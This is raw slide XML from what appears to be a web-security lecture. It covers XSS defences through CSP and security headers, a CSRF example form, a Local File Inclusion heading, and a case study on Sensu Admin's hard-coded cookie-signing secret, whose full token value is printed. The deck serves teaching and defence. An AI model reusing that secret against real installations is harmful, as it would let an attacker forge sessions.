                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="6BBF4E"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Helvetica Neue"/>
                        <a:buChar char="●"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="363F44"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica Neue"/>
                          <a:ea typeface="Helvetica Neue"/>
                          <a:cs typeface="Helvetica Neue"/>
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Use an HTML sanitization engine for user-specified HTML</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="363F44"/>
                        </a:solidFill>
                        <a:latin typeface="Helvetica Neue"/>
                        <a:ea typeface="Helvetica Neue"/>
                        <a:cs typeface="Helvetica Neue"/>
                        <a:sym typeface="Helvetica Neue"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="914400" lvl="1" indent="-292100" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="6BBF4E"/>
                        </a:buClr>
                        <a:buSzPts val="1000"/>
                        <a:buFont typeface="Helvetica Neue"/>
                        <a:buChar char="○"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="363F44"/>
                          </a:solidFill>
                          <a:latin typeface="Helvetica Neue"/>
                          <a:ea typeface="Helvetica Neue"/>
                          <a:cs typeface="Helvetica Neue"/>
                          <a:sym typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t>Some forums, web mail services, etc. allow using your own HTML</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="363F44"/>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207"/>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Defense in Depth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Google Shape;1445;p207"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1319075"/>
            <a:ext cx="8285400" cy="31083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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> header to restrict script execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Content-Security-Policy: script-src 'self' *.trusted.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> cookies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Set-Cookie: ID=4243444546; domain=example.com; HttpOnly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Source Code Pro"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>X-XSS-Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>X-XSS-Protection: 1; mode=block</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Source Code Pro"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>X-Content-Type-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>X-Content-Type-Options: nosniff</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1446" name="Google Shape;1446;p207"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7290933" y="2945191"/>
            <a:ext cx="1463424" cy="17876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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;p208"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5973375" y="2749150"/>
            <a:ext cx="2109300" cy="8700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;1452;p208"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-423419">
            <a:off x="5973010" y="1694429"/>
            <a:ext cx="2256293" cy="10891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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Hacks</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Permanent Marker"/>
              <a:ea typeface="Permanent Marker"/>
              <a:cs typeface="Permanent Marker"/>
              <a:sym typeface="Permanent Marke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209"/>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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;p209"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="1231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Allows unauthorized commands to be executed on behalf of a user that a web application trusts due to its existing session with the service</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Abuses Same-Origin Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="2316363"/>
            <a:ext cx="4398600" cy="206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363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;form method="post"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    &lt;input type="checkbox"&gt; ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    &lt;input type="checkbox"&gt; ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    &lt;input type="checkbox"&gt; ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    &lt;input type="text" name="custom-dns"&gt; ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    &lt;input type="text" name="gateway-metric”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1460" name="Google Shape;1460;p209"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="28351" r="7011"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138700" y="1829525"/>
            <a:ext cx="3908950" cy="30343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210"/>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Local File Inclusion (LFI)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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5675" y="-5275"/>
            <a:ext cx="9188100" cy="244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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="1152475"/>
            <a:ext cx="8607013" cy="34164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SzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0" err="1"/>
              <a:t>Sensu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t> Admin was an admin interface for the monitoring technology, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0" err="1"/>
              <a:t>Sensu</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>The software includes a hard coded secret for encrypting and signing cookies</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A737D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Your secret key for verifying the integrity of signed cookies.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t># If you change this key, all old signed cookies will become invalid!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t># Make sure the secret is at least 30 characters and all random,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t># no regular words or you'll be exposed to dictionary attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>SensuAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>.config.secret_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> '5b1702cbb0b483cd035ba078b16cb12e638b5d7fca97b74c428ac82dcb47e4eef418c6d1b767a83b32511467102a2e864d4c6285e9e24b38f5423bcfafee958a'</a:t>
            </a:r>
            <a:endParaRPr sz="1300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
